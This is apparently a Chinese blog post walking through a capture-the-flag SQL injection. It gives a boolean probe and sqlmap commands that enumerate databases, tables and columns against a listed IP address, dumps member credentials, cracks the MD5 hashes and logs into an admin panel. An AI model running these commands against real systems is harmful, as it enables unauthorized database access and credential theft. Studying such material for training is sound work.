温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
获取短信验证码
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》
登 录 注册有礼
云服务器 香港服务器 高防服务器
最新更新 网站标签 地图导航
产品

sqlmap注入的示例分析

发布时间:2021-08-12 09:23:39 来源:亿速云 阅读:111 作者:小新 栏目:开发技术

这篇文章主要介绍sqlmap注入的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入 and 1=1 发现页面正常显示。

sqlmap注入的示例分析

再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞

sqlmap注入的示例分析

2.现在拿出我们的kali工具,sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

sqlmap注入的示例分析

3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

sqlmap注入的示例分析

4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap注入的示例分析

5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

sqlmap注入的示例分析

sqlmap注入的示例分析

6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里

sqlmap注入的示例分析

7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。

sqlmap注入的示例分析

8.END 登录成功,拿到flag,提交。Gameover !

以上是“sqlmap注入的示例分析”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注亿速云行业资讯频道!

向AI问一下细节
推荐阅读:
  1. SQLMAP注入json格式数据
  2. SQL注入神器——sqlmap

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

sqlmap

猜你喜欢

最新资讯
相关推荐

相关标签

sqlldr mysql5.6.40 psql mysql临时文件大小设置 mysql mha mysql5.7.20 sql权限 sqlloader 监控mysql plsql乱码 mysql服务器 sql compare mysql主从数据库 mysql远程访问 mysql参数 mysql全量备份 动态sql语句 mysql注入 mysql的安装 mysql-bin
AI

产品服务
地区划分
专题活动
帮助支持
关于我们
售后咨询
7*24小时在线电话:400-100-2938
7*24小时在线 QQ:800811969
关注亿速云

亿速云公众号

手机网站二维码

Copyright © Yisu Cloud Ltd. All Rights Reserved. 2018 版权所有

广州亿速云计算有限公司粤ICP备17096448号-1 粤公网安备 44010402001142号增值电信业务经营许可证编号:B1-20181529